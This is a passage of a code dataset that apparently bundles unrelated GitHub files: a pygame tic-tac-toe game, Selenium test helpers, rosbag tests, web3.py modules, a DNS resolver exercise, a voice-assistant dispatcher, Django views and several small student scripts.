int(CELL_HEIGHT*0.8)\nIN_CELL_OFFSET = IN_CELL_OFFSET_WIDTH, IN_CELL_OFFSET_HEIGHT = int((CELL_WIDTH-MARK_WIDTH)/2), int((CELL_HEIGHT-MARK_HEIGHT)/2)\nWHITE = (255, 255, 255)\nBLUE = (0, 0, 255)\nRED = (255, 0, 0)\n\n\ndef _translate_to_screen_coords(coords):\n return coords[0] * CELL_WIDTH + IN_CELL_OFFSET_WIDTH, coords[1] * CELL_HEIGHT + IN_CELL_OFFSET_HEIGHT\n\n\nif __name__ == '__main__':\n # Set up display\n pygame.display.init()\n screen = pygame.display.set_mode(SCREEN_SIZE)\n\n mark_x = pygame.Surface(MARK_SIZE)\n pygame.draw.line(mark_x, BLUE, (0, 0), (MARK_WIDTH, MARK_HEIGHT), 10)\n pygame.draw.line(mark_x, BLUE, (0, MARK_HEIGHT), (MARK_WIDTH, 0), 10)\n\n mark_o = pygame.Surface(MARK_SIZE)\n pygame.draw.circle(mark_o, RED, 
(int(MARK_WIDTH/2), int(MARK_HEIGHT/2)), MARK_WIDTH/2, 10)\n\n player_mark = {\n 1: mark_x,\n 2: mark_o\n }\n\n # Set up board\n pygame.draw.line(screen, WHITE, (int(SCREEN_WIDTH/3), 0), (int(SCREEN_WIDTH/3), SCREEN_HEIGHT))\n pygame.draw.line(screen, WHITE, (int(SCREEN_WIDTH/3)*2, 0), (int(SCREEN_WIDTH/3)*2, SCREEN_HEIGHT))\n pygame.draw.line(screen, WHITE, (0, int(SCREEN_HEIGHT/3)), (SCREEN_WIDTH, int(SCREEN_HEIGHT/3)))\n pygame.draw.line(screen, WHITE, (0, int(SCREEN_HEIGHT/3)*2), (SCREEN_WIDTH, int(SCREEN_HEIGHT/3)*2))\n \n # Draw screen\n pygame.display.flip()\n\n is_ai_turn = False\n is_ended = False\n\n # Initialize backend\n game_client = TicTacToeClient(first_player=1)\n game_ai = TicTacToeAI(ai_id=2, game_object=game_client)\n\n\n # Main game loop\n while True:\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.constants.QUIT:\n sys.exit()\n elif event.type == pygame.constants.MOUSEBUTTONUP:\n if not is_ai_turn and not is_ended:\n cursor_position = pygame.mouse.get_pos()\n coords = math.floor(cursor_position[0]/CELL_SIZE[0]), math.floor(cursor_position[1]/CELL_SIZE[1])\n player_coord = game_client.move(player_id=1, coord=coords)\n draw_coords = _translate_to_screen_coords(player_coord)\n screen.blit(player_mark[1], draw_coords)\n is_ai_turn = True\n is_ended = game_client.is_ended()\n\n if is_ai_turn and not is_ended:\n ai_coord = game_ai.move()\n draw_coords = _translate_to_screen_coords(ai_coord)\n screen.blit(player_mark[2], draw_coords)\n is_ai_turn=False\n is_ended = game_client.is_ended()\n \n pygame.display.flip()\n","repo_name":"Zsombroo/tic-tac-toe-with-ai","sub_path":"TicTacToePython/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26238769294","text":"from selenium.webdriver.support import expected_conditions as EC\nimport math\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.common.exceptions import NoAlertPresentException # в начале файла\nfrom selenium.webdriver import Remote as RemoteWebDriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom .locators import BasePageLocators\n\n\nclass BasePage():\n def __init__(self, browser: RemoteWebDriver, url, timeout=10):\n self.browser = browser\n self.url: str = url\n self.browser.implicitly_wait(timeout)\n\n def open(self):\n self.browser.get(self.url)\n\n def is_element_present(self, how, what) -> bool:\n \"\"\"\n Проверка на наличие элемента на странице\n\n :param how: как искать при помощи классов BY\n :param what: str что искать\n :return: bool\n \"\"\"\n try:\n self.browser.find_element(how, what)\n except NoSuchElementException:\n return False\n return True\n\n def solve_quiz_and_get_code(self):\n alert = self.browser.switch_to.alert\n x = alert.text.split(\" \")[2]\n answer = str(math.log(abs((12 * math.sin(float(x))))))\n alert.send_keys(answer)\n alert.accept()\n try:\n alert = self.browser.switch_to.alert\n alert_text = alert.text\n print(f\"Your code: {alert_text}\")\n alert.accept()\n except NoAlertPresentException:\n print(\"No second alert presented\")\n\n def is_not_element_present(self, how, what, timeout=4):\n \"\"\"\n is_not_element_present: упадет, как только увидит искомый элемент.\n Не появился: успех, тест зеленый.\n https://stepik.org/lesson/201964/step/5?unit=176022\n абстрактный метод, который проверяет, что элемент не появляется на странице в течение заданного времени\n\n 
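(In English: checks that the element does not appear on the page within the given timeout.)\n\n        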
Пример использования\n\n def should_not_be_success_message(self):\n assert self.is_not_element_present(*ProductPageLocators.SUCCESS_MESSAGE), \\\n \"Success message is presented, but should not be\"\n\n :param self:\n :param how:\n :param what:\n :param timeout:\n :return:\n \"\"\"\n try:\n WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return True\n\n return False\n\n def is_disappeared(self, how, what, timeout=4):\n \"\"\"\n is_disappeared: будет ждать до тех пор, пока элемент не исчезнет.\n https://stepik.org/lesson/201964/step/5?unit=176022\n Если же мы хотим проверить, что какой-то элемент исчезает, то следует воспользоваться\n явным ожиданием вместе с функцией until_not, в зависимости от того, какой результат мы ожидаем\n\n :param self:\n :param how:\n :param what:\n :param timeout:\n :return:\n \"\"\"\n try:\n WebDriverWait(self.browser, timeout, 1, TimeoutException). \\\n until_not(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n return True\n\n def go_to_login_page(self):\n \"\"\"\n Переход на страницу с логином\n :return:\n \"\"\"\n link = self.browser.find_element(*BasePageLocators.LOGIN_LINK)\n link.click()\n\n def should_be_login_link(self):\n \"\"\"\n Проверям есть ли элемент Логин на странице\n :return:\n \"\"\"\n assert self.is_element_present(*BasePageLocators.LOGIN_LINK), \"Login link is not presented\"\n\n def open_basket(self):\n \"\"\"\n Переходит в корзину по кнопке в шапке\n :return:\n \"\"\"\n link = self.browser.find_element(*BasePageLocators.BASKET_LINK)\n link.click()","repo_name":"ivanovnickolay/stepik_python","sub_path":"Python_selenium/Lesson_4/pages/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12341258301","text":"import unittest\nimport tempfile\nimport os\n\nimport rosbag\nimport rospy\n\nBAG_DIR = tempfile.mkdtemp(prefix='rosbag_tests')\n\nclass TestRoundTrip(unittest.TestCase):\n def _write_simple_bag(self, name):\n from std_msgs.msg import Int32, String\n\n with rosbag.Bag(name, 'w') as bag:\n s = String(data='foo')\n i = Int32(data=42)\n\n bag.write('chatter', s)\n bag.write('numbers', i)\n\n def _fname(self, name):\n return os.path.join(BAG_DIR, name)\n\n def test_value_equality(self):\n fname = self._fname('test_value_equality.bag')\n\n self._write_simple_bag(fname)\n\n with rosbag.Bag(fname) as bag:\n numbers = list(bag.read_messages('numbers'))\n chatter = list(bag.read_messages('chatter'))\n\n self.assertEqual(len(numbers), 1)\n self.assertEqual(len(chatter), 1)\n\n numbers = numbers[0]\n chatter = chatter[0]\n\n # channel names\n self.assertEqual(numbers[0], 'numbers')\n self.assertEqual(chatter[0], 'chatter')\n\n # values\n self.assertEqual(numbers[1].data, 42)\n self.assertEqual(chatter[1].data, 'foo')\n\n @unittest.expectedFailure\n def test_type_equality(self):\n fname = self._fname('test_type_equality.bag')\n\n from std_msgs.msg import Int32, String\n\n self._write_simple_bag(fname)\n\n with rosbag.Bag(fname) as bag:\n numbers = next(bag.read_messages('numbers'))\n chatter = next(bag.read_messages('chatter'))\n\n self.assertEqual(numbers[1].__class__, Int32)\n self.assertEqual(chatter[1].__class__, String)\n\n @unittest.expectedFailure\n def test_type_isinstance(self):\n fname = self._fname('test_type_isinstance.bag')\n\n from std_msgs.msg import Int32, String\n\n 
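# rosbag reads messages back as dynamically generated classes, which is presumably why these direct type checks carry expectedFailure\n        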
self._write_simple_bag(fname)\n\n with rosbag.Bag(fname) as bag:\n numbers = next(bag.read_messages('numbers'))\n chatter = next(bag.read_messages('chatter'))\n\n self.assertIsInstance(numbers[1], Int32)\n self.assertIsInstance(chatter[1], String)\n","repo_name":"ros/ros_comm","sub_path":"tools/rosbag/test/test_roundtrip.py","file_name":"test_roundtrip.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":712,"dataset":"github-code","pt":"37"} +{"seq_id":"36668060699","text":"from eth_account import Account # noqa: E402,\nimport pkg_resources\n\nfrom web3.main import (\n AsyncWeb3,\n Web3,\n)\nfrom web3.providers.async_rpc import ( # noqa: E402\n AsyncHTTPProvider,\n)\nfrom web3.providers.eth_tester import ( # noqa: E402\n EthereumTesterProvider,\n)\nfrom web3.providers.ipc import ( # noqa: E402\n IPCProvider,\n)\nfrom web3.providers.rpc import ( # noqa: E402\n HTTPProvider,\n)\nfrom web3.providers.websocket import ( # noqa: E402\n WebsocketProvider,\n WebsocketProviderV2,\n)\n\n__version__ = pkg_resources.get_distribution(\"web3\").version\n\n__all__ = [\n \"__version__\",\n \"AsyncWeb3\",\n \"Web3\",\n \"HTTPProvider\",\n \"IPCProvider\",\n \"WebsocketProvider\",\n \"WebsocketProviderV2\",\n \"EthereumTesterProvider\",\n \"Account\",\n \"AsyncHTTPProvider\",\n]\n","repo_name":"ethereum/web3.py","sub_path":"web3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":4510,"dataset":"github-code","pt":"37"} +{"seq_id":"40435279355","text":"# use google images api to download map images\n# importing google_images_download module \nfrom google_images_download import google_images_download \ndef downloadimages(query): \n arguments = {\"keywords\": query, \"format\": \"png\", \"limit\":100, \n \"print_urls\":True, \"size\": \"medium\",\n \"chromedriver\":\"C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\chromedriver\\\\chromedriver.exe\"} \n try: \n response.download(arguments) \n \n # Handling File NotFound Error \n except FileNotFoundError: \n arguments = {\"keywords\": query, \n \"format\": \"jpg\", \n \"limit\":100, \n \"print_urls\":True, \n \"size\": \"medium\",\n \"chromedriver\":\"C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\chromedriver\\\\chromedriver.exe\"} \n \n # Providing arguments for the searched query \n try: \n # Downloading the photos based \n # on the given arguments \n response.download(arguments) \n except: \n pass\n \n# creating object \nresponse = google_images_download.googleimagesdownload() \n \nsearch_queries = ['world map']\n \n# Driver Code 0\nfor query in search_queries: \n downloadimages(query) \n print() \n\n","repo_name":"JialinLiOSU/classifyThematicMaps","sub_path":"downloadImages/imageDownload.py","file_name":"imageDownload.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8072142220","text":"from input_module import take_input\nfrom music import *\nfrom timeANDdate_module import get_time, get_date, get_day\nfrom database import *\nfrom output_module import output\nfrom internet import check_internet_connection, check_on_wikipedia\nimport assistance_details\nfrom web import close_browser, open_facebook, open_google\n\n\ndef process(query):\n\n if \"play\" in query and \"music\" not in query:\n answer = get_answer_from_memory(\"play specific\")\n\n elif \"set volume\" in query:\n answer = 
get_answer_from_memory(\"set volume\")\n else:\n answer = get_answer_from_memory(query)\n\n # ----------------------------------------------------------\n\n # change name\n if answer == \"change name\":\n output(\"Okay! what do you want to call me?\")\n temp = take_input()\n if temp == assistance_details.name:\n return \"can't change. I think you're happy with my old name\"\n else:\n update_name(temp)\n assistance_details.name = temp\n return \"Now you can call me \" + temp\n\n # -----------------------------------------------------------\n\n # speech mode on\n elif answer == \"speech mode on\":\n speech_on()\n\n # speech mode off\n elif answer == \"speech mode off\":\n speech_off()\n\n # --------------------------------------------------------------\n\n # PA name\n elif answer == \"your name\":\n return (\"I am \"+assistance_details.name)\n\n # ------------------------------------------------------------\n\n # Current Time Details\n elif answer == \"get time details\":\n return (\"Time is \" + get_time())\n\n\n # Today's Day details\n elif answer == \"week day details\":\n return (\"Today is \" + get_day())\n\n # Today's Date details\n elif answer == \"todays date details\":\n return (str(get_date()))\n\n # ------------------------------------------------------------\n\n # open facebook\n elif answer == \"open facebook\":\n open_facebook()\n return \"opening facebook\"\n\n # open google/browser\n elif answer == \"open google\":\n open_google()\n return \"opening google\"\n\n # close google/browser\n elif answer == \"close browser\":\n close_browser()\n return \"your current browser is closed\"\n \n # check internet connection\n elif answer == \"check internet connection\":\n if check_internet_connection():\n return \"Internet is Connected\"\n\n else:\n return \"Internet is NOT Connected\"\n\n # ------------------------------------------------------------\n\n # play song\n elif answer == \"play music\":\n play_music()\n return \"playing music\"\n\n # pause/stop music\n elif answer == \"pause music\" or answer == \"stop music\":\n pause_music()\n return \"paused\"\n\n # volume up music\n elif answer == \"volume up\":\n volume_up()\n return \"increased\"\n \n # volume down music\n elif answer == \"volume down\":\n volume_down()\n return \"decreased\"\n\n # next song\n elif answer == \"next song\":\n next_song()\n return \"playing next\"\n\n # previous song\n elif answer == \"previous song\":\n previous_song()\n return \"playing previous\"\n\n elif answer == \"play specific\":\n return play_specific_song(query)\n\n elif answer == \"set volume\":\n return set_volume(query)\n\n\n # ------------------------------------------------------------\n\n # teach PA and search on wikipedia\n else:\n\n # search on wikipedia\n output(\"Don't know this one should I search on web\")\n ans = take_input()\n if \"yes\" in ans:\n \n answer = check_on_wikipedia(query)\n if answer != \"\":\n output(\"Here is what I found on Web\")\n return answer\n else:\n\n # teach PA\n output(\"can you please tell me what it means?\")\n ans = take_input()\n if \"it means\" in ans:\n ans = ans.replace(\"it means\", \"\")\n ans = ans.strip()\n\n value = get_answer_from_memory(ans)\n if value == \"\":\n return \"can't help with this one\"\n\n else:\n insert_question_and_answer(query, value)\n return \"Thanks I will remember it for the next time\"\n else:\n return \"can't help with this 
one\"\n\n","repo_name":"kamitssm123/Narad-Desktop-Assistance","sub_path":"process_module.py","file_name":"process_module.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4415980298","text":"#Irvin Vásquez Figueroa\r\n#A01541101\r\n#Objetivo: pedir apellidos e imprimir datos de estos.\r\napellido_paterno = (input(\"¿Cuál es tu apellido paterno?\"))\r\napellido_materno = (input(\"¿Y el materno?\"))\r\n#Se piden los apellidos al usuario.\r\n\r\nprint(\"Tu apellido paterno tiene \",len(apellido_paterno) , \"letras\")\r\n#Se imprime la longitud del apellido paterno. Es decir, cuántas letras tiene.\r\n\r\nx = 0\r\nfor letras in apellido_materno:\r\n #Se hace un ciclo for que va recorriendo cada letra del apellido materno\r\n if letras.lower() in \"a e i o u\":\r\n #Se hace un if, en donde primero se convierten las letras del apellido en minúscula\r\n #Después, si la letra en la que se va recorriendo es alguna vocal, se le suma 1 al contador.\r\n x = x+1\r\nprint (\"Tu apellido materno tiene \" , x, \" vocales\")\r\n#Se imprime el número de vocales que tiene\r\n\r\nprint(apellido_paterno,\"$$$\",apellido_materno)\r\n#Se imprimen ambos apellidos con el símbolo de dinero en medio.\r\n","repo_name":"IrvinVF/Actividad11_clase","sub_path":"actividad11.py","file_name":"actividad11.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36668407709","text":"from typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n)\n\nfrom eth_utils import (\n is_dict,\n)\nfrom eth_utils.curried import (\n apply_formatter_if,\n apply_formatters_to_dict,\n apply_key_map,\n is_null,\n)\nfrom eth_utils.toolz import (\n complement,\n compose,\n)\nfrom hexbytes import (\n HexBytes,\n)\n\nfrom web3._utils.rpc_abi import (\n RPC,\n)\nfrom web3.middleware.formatting import (\n async_construct_formatting_middleware,\n construct_formatting_middleware,\n)\nfrom web3.types import (\n AsyncMiddlewareCoroutine,\n RPCEndpoint,\n)\n\nif TYPE_CHECKING:\n from web3 import ( # noqa: F401\n AsyncWeb3,\n Web3,\n )\n\nis_not_null = complement(is_null)\n\nremap_geth_poa_fields = apply_key_map(\n {\n \"extraData\": \"proofOfAuthorityData\",\n }\n)\n\npythonic_geth_poa = apply_formatters_to_dict(\n {\n \"proofOfAuthorityData\": HexBytes,\n }\n)\n\ngeth_poa_cleanup = compose(pythonic_geth_poa, remap_geth_poa_fields)\n\n\ngeth_poa_middleware = construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n },\n)\n\n\nasync def async_geth_poa_middleware(\n make_request: Callable[[RPCEndpoint, Any], Any], w3: \"AsyncWeb3\"\n) -> AsyncMiddlewareCoroutine:\n middleware = await async_construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_subscribe: apply_formatter_if(\n is_not_null,\n # original call to eth_subscribe returns a string, needs a dict check\n apply_formatter_if(is_dict, geth_poa_cleanup),\n ),\n },\n )\n return await middleware(make_request, 
w3)\n","repo_name":"ethereum/web3.py","sub_path":"web3/middleware/geth_poa.py","file_name":"geth_poa.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":4510,"dataset":"github-code","pt":"37"}
+{"seq_id":"35918621249","text":"def busca_binaria(seq, x):\n    ''' (list, float) -> bool\n    retorna True se x ocorre na lista ordenada,\n    ou None caso contrario, usando o algoritmo de busca binaria.\n    '''\n    t = len(seq)\n    m = int(t / 2)\n    \n    if seq[m] == x:\n        return True\n\n    if seq[m] > x:\n        for i in range(0, m):\n            if seq[i] == x:\n                return True\n    if seq[m] < x:\n        for i in range(m + 1, len(seq)):\n            if seq[i] == x:\n                return True\n\n    return None\n\n\n# escreva alguns testes da funcao busca_binaria\nseq = [4, 10, 80, 90, 91, 99, 100, 101]\ntestes = [80, 50,101]\n\nfor t in testes:\n    pos = busca_binaria(seq, t)\n    if pos is None:\n        print(\"Nao achei \", t)\n    else:\n        print(\"Achei \", t)\n\n","repo_name":"brunoparodi/IME-USP-Coursera","sub_path":"Parte02/Aulas/23_02_busca_binaria.py","file_name":"23_02_busca_binaria.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2252700972","text":"import socket\r\nfrom argparse import ArgumentParser\r\nimport binascii\r\nimport random\r\nimport time\r\nfrom datetime import datetime\r\nrandom.seed(1220)\r\ncache = {}\r\n\r\ndef parse_args():\r\n    # parse the command line arguments\r\n    args = ArgumentParser()\r\n    args.add_argument('--host', default='localhost')\r\n    args.add_argument('--port', default=20000, type=int)\r\n    return args.parse_args()\r\n\r\n# get ip from a response\r\ndef getIP(auth_response):\r\n    auth_response=getList(auth_response)\r\n    \r\n    lenQNameInt = int(auth_response[12], base=16)\r\n    lenTldInt = int(auth_response[12+lenQNameInt+1], base=16)\r\n    StartofAnswer = 12+lenQNameInt+1+lenTldInt +1 + 5\r\n    record_list=[]\r\n    i=0\r\n    numAns = int(auth_response[7], base=16)\r\n    # get ip address from response from server\r\n    while(i < numAns):\r\n        ipAndttl = [] # format: [ipaddress,ttl]\r\n        ans = StartofAnswer +11\r\n        if int(auth_response[ans], base=16) == 4:\r\n            a = int(auth_response[ans+1], base=16)\r\n            b = int(auth_response[ans+2], base=16)\r\n            c = int(auth_response[ans+3], base=16)\r\n            d = int(auth_response[ans+4], base=16)\r\n            ansIP = str(a) + '.' + str(b) + '.' + str(c) + '.' 
+ str(d) \r\n ipAndttl.append(ansIP)\r\n \r\n ipAndttl.append(int(auth_response[ans-3]+auth_response[ans-2], base=16))\r\n StartofAnswer = ans+int(auth_response[ans], base=16)+1\r\n record_list.append(ipAndttl)\r\n i+=1\r\n ipAddr = random.choice(record_list)\r\n print(\"HTTP Server IP address:\",ipAddr[0])\r\n return ipAddr\r\n\r\n# return domain name of a request\r\ndef getHostname(message):\r\n \r\n message =getList(binascii.hexlify(message).decode(\"utf-8\"))\r\n qname = []\r\n lenQNameInt = int(message[12], base=16)\r\n lenTldInt= int(message[12+lenQNameInt+1], base=16)\r\n for i in range(lenQNameInt):\r\n qname.append(bytearray.fromhex(message[13+i]).decode())\r\n qname.append(\".\")\r\n for i in range(lenTldInt):\r\n qname.append(bytearray.fromhex(message[12+lenQNameInt+2+i]).decode())\r\n return \"\".join(qname)\r\n\r\n# Creates a server, recieves requests from client, and sends back response to client\r\ndef start_udp_server(host, port):\r\n # create a server socket with the following specifications\r\n # AF_INET -> IPv4 socket\r\n # SOCK_DGRAM -> UDP protocol\r\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as server_socket:\r\n\r\n # bind the socket to a OS port\r\n server_socket.bind((host, port))\r\n\r\n # start receiving udp packets in an infinite loop\r\n while True:\r\n # data, addr = recvfrom(n)\r\n # n -> buffer size, i.e., number of max bytes to receive\r\n # data -> the message received from the client\r\n # addr -> the address of the client\r\n\r\n message, addr = server_socket.recvfrom(1024)\r\n time_recv_from_client = time.time()\r\n\r\n print(\"Domain:\",getHostname(message))\r\n hostname =getHostname(message)\r\n in_cache=0\r\n # determine if host name in cache\r\n if hostname in cache:\r\n ts = time.time()\r\n diff = int(ts)-cache[hostname][2]\r\n if diff < cache[hostname][1]:\r\n in_cache = 1\r\n if in_cache == 1:\r\n print(\"IN CACHE\")\r\n response = cache[hostname]\r\n getIP(response[0])\r\n else:\r\n print(\"NOT IN CACHE\")\r\n response = getAuthIp(message) # DNS Response with format[response,ttl]\r\n ts = time.time()\r\n #store[response,ttl,ts] into cache\r\n cache[hostname] = [response[0],response[1],int(ts)]\r\n \r\n # send response back to client\r\n time_send_to_client = time.time()\r\n server_socket.sendto(binascii.unhexlify(response[0]), addr)\r\n \r\n print(\"Total time to resolve host name: \", time_send_to_client - time_recv_from_client)\r\n\r\n# # Send DNS requests to servers\r\ndef start_udp_client(server_host, server_port, message):\r\n\r\n # create a client socket with the following specifications\r\n # AF_INET -> IPv4 socket\r\n # SOCK_DGRAM -> UDP protocol\r\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as client_socket:\r\n\r\n # send message to server at address (server_host, server_port)\r\n \r\n # ----- message from client -----\r\n # message = \"BB AA 00 00 00 01 00 00 00 00 00 00 03 74 6D 7A 03 63 6f 6d 00 00 01 00 01\" \r\n # message = message.replace(\" \", \"\").replace(\"\\n\", \"\")\r\n # client_socket.sendto(binascii.unhexlify(message), (server_host, server_port))\r\n client_socket.sendto(message, (server_host, server_port))\r\n # print(\"DNS request sent\")\r\n message, addr = client_socket.recvfrom(2048)\r\n \r\n return binascii.hexlify(message).decode(\"utf-8\")\r\n\r\n# Helper function used to unpack responses\r\ndef getList(hex):\r\n octets = [hex[i:i+2] for i in range(0, len(hex), 2)]\r\n return octets\r\n\r\n# Given a DNS response returns an IP Address to TLD or AUTH servers\r\ndef getServerIP(res):\r\n 
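# walks past the authority records, then scans the additional section for IPv4 glue records (RDLENGTH == 4) and returns one at random\r\n    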
lenQNameInt = int(res[12], base=16)\r\n    lenTldInt = int(res[12+lenQNameInt+1], base=16)\r\n    StartofAnswer = 12+lenQNameInt+1+lenTldInt +1 + 5\r\n    \r\n    auth_num = int(res[9], base=16)\r\n    index = StartofAnswer\r\n    i=0\r\n    while(i < auth_num):\r\n        end_index = index +11 + int(res[index+11], base=16)\r\n        index = end_index+1\r\n        i+=1\r\n\r\n    record_list=[]\r\n\r\n    i=0\r\n    add_num = int(res[11], base=16)\r\n\r\n    while(i < add_num):\r\n        addr_lenth_index = index +11 \r\n        if int(res[addr_lenth_index], base=16) == 4:\r\n            a = int(res[addr_lenth_index+1], base=16)\r\n            b = int(res[addr_lenth_index+2], base=16)\r\n            c = int(res[addr_lenth_index+3], base=16)\r\n            d = int(res[addr_lenth_index+4], base=16)\r\n            ipAd = str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d) \r\n            record_list.append(ipAd)\r\n        index = addr_lenth_index+int(res[addr_lenth_index], base=16)+1\r\n        i+=1\r\n    return random.choice(record_list)\r\n\r\n# Send request to ROOT, TLD, and AUTH servers, returns AUTH response and TTL\r\ndef getAuthIp(message):\r\n    # ------ DNS -> ROOT -------\r\n    # ROOT DNS IPs\r\n    ipArr = [\"198.41.0.4\", \"199.9.14.201\", \"192.33.4.12\", \"199.7.91.13\", \"192.203.230.10\", \"192.5.5.241\", \"192.112.36.4\", \"198.97.190.53\", \"192.36.148.17\", \"192.58.128.30\", \"193.0.14.129\", \"199.7.83.42\", \"202.12.27.33\"]\r\n\r\n    root_server_host = random.choice(ipArr)\r\n    print(\"Root server IP address: \",root_server_host)\r\n    server_port = 53\r\n    \r\n    # RTT from local DNS to ROOT\r\n    time_sent_root = time.time() \r\n    root_response = start_udp_client(root_server_host, server_port,message)\r\n    time_recv_root = time.time()\r\n    print(\"RTT_ROOT: \", time_recv_root - time_sent_root)\r\n\r\n    root_response = getList(root_response)\r\n\r\n    add_num = int(root_response[11], base=16)\r\n    if add_num <1:\r\n        print(\"NO TLD RECEIVED\", len(root_response))\r\n    else:\r\n        tldIP=getServerIP(root_response)\r\n        print(\"TLD server IP address: \", tldIP)\r\n\r\n    # ----- DNS -> TLD ------\r\n    # RTT from local DNS to TLD\r\n    time_sent_tld = time.time() \r\n    tld_response = start_udp_client(tldIP, server_port,message)\r\n    time_recv_tld = time.time() \r\n    print(\"RTT_TLD: \", time_recv_tld - time_sent_tld)\r\n\r\n    tld_response = getList(tld_response)\r\n    auth_ip = getServerIP(tld_response)\r\n    print(\"Authoritative server IP address\",auth_ip)\r\n\r\n    # ----- DNS -> AUTH ------\r\n    # RTT from local DNS to AUTH\r\n    time_sent_auth = time.time() \r\n    auth_response = start_udp_client(auth_ip, server_port,message)\r\n    time_recv_auth = time.time()\r\n    print(\"RTT_AUTH: \", time_recv_auth - time_sent_auth)\r\n    # print(\"Number of Answers:\", int(auth_response[7], base=16))\r\n    # print(\"Number of authority records:\", int(auth_response[9], base=16))\r\n    # print(\"Number of additional records:\", int(auth_response[11], base=16))\r\n    \r\n    #get random final ip address\r\n    ttl = int(auth_response[-16:-12], base=16)\r\n    result= auth_response\r\n    getIP(auth_response)\r\n\r\n    print(\"TTL: \", ttl, \" seconds\")\r\n\r\n    return [result,ttl]\r\n\r\nif __name__ == '__main__':\r\n    args = parse_args()\r\n    start_udp_server(args.host, args.port)\r\n    \r\n","repo_name":"wanweny/ECS152A-Computer-Networks","sub_path":"project2/PartC.py","file_name":"PartC.py","file_ext":"py","file_size_in_byte":8401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"5062497431","text":"# https://leetcode.com/problems/set-matrix-zeroes/\n\n\n\nclass Solution:\n    def setZeroes(self, matrix: List[List[int]]) -> None:\n        \"\"\"\n        
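Two-pass approach: record the coordinates of every zero first, then clear the matching rows and columns.\n        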
Do not return anything, modify matrix in-place instead.\n \"\"\"\n z = []\n m = len(matrix)\n n = len(matrix[0])\n for i in range(m):\n for j in range(n):\n if matrix[i][j]==0:\n z = z + [(i,j)]\n for k in z:\n for a in range(m):\n matrix[a][k[1]]=0\n for a in range(n):\n matrix[k[0]][a]=0\n \n ","repo_name":"bmk15897/Striver-Sheet","sub_path":"arrays-1.py","file_name":"arrays-1.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33863539325","text":"# -*- coding: utf-8 -*-\r\n'''\r\n@createBy : xiaowu \r\n@date : 2019/10/22 14:16:41\r\n'''\r\n\r\nimport multiprocessing as mp\r\n\r\ndef job(q):\r\n res = 0\r\n \r\n for i in range(12):\r\n res += i+i**2+i**3\r\n q.put(res)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n queue = mp.Queue()\r\n p1 = mp.Process(target=job,args=(queue,))\r\n p1.start()\r\n for _ in range(1000):\r\n if(not queue.empty()):\r\n print('has')\r\n else:\r\n print('emtpy')","repo_name":"xiaowu5759/xwspider","sub_path":"doban_spider/try_test/processing_mp_test.py","file_name":"processing_mp_test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71522432427","text":"from django.shortcuts import render,redirect,render_to_response\nfrom django.contrib import messages\nfrom .models import Libro,Autor\n\n# Create your views here.\ndef index(request):\n libros = Libro.objects.all()\n context = {\n \"libros\" : libros\n }\n return render(request,'index.html',context)\n\ndef addBook(request):\n if request.method == 'POST':\n Libro.objects.create(title=request.POST[\"title\"],desc=request.POST[\"desc\"])\n return redirect('/')\n\n\ndef books(request,idbook):\n request.session[\"idbook\"] = idbook\n libro = Libro.objects.get(id=idbook)\n filtered_entry = Autor.objects.all()\n for exclude_entry in libro.autores.all():\n filtered_entry = filtered_entry.exclude(id=exclude_entry.id)\n context = {\n \"libro\" : libro,\n \"addAutors\" : filtered_entry\n }\n return render(request,'books.html',context)\n\ndef addAuthor(request):\n if request.method == 'GET':\n idbook = request.session[\"idbook\"]\n if request.GET[\"author\"] != \"0\":\n idbook = request.session[\"idbook\"]\n Autor.objects.get(id=request.GET[\"author\"]).libros.add(Libro.objects.get(id=idbook))\n else:\n messages.info(request,\"No se ha seleccionado ningun Autor\")\n return redirect(f'books/{idbook}')\n\n\n\ndef authorIndex(request):\n author = Autor.objects.all()\n context = {\n \"authors\" : author\n }\n return render(request,'authors.html',context)\n\ndef addNewAuthor(request):\n if request.method == 'POST':\n 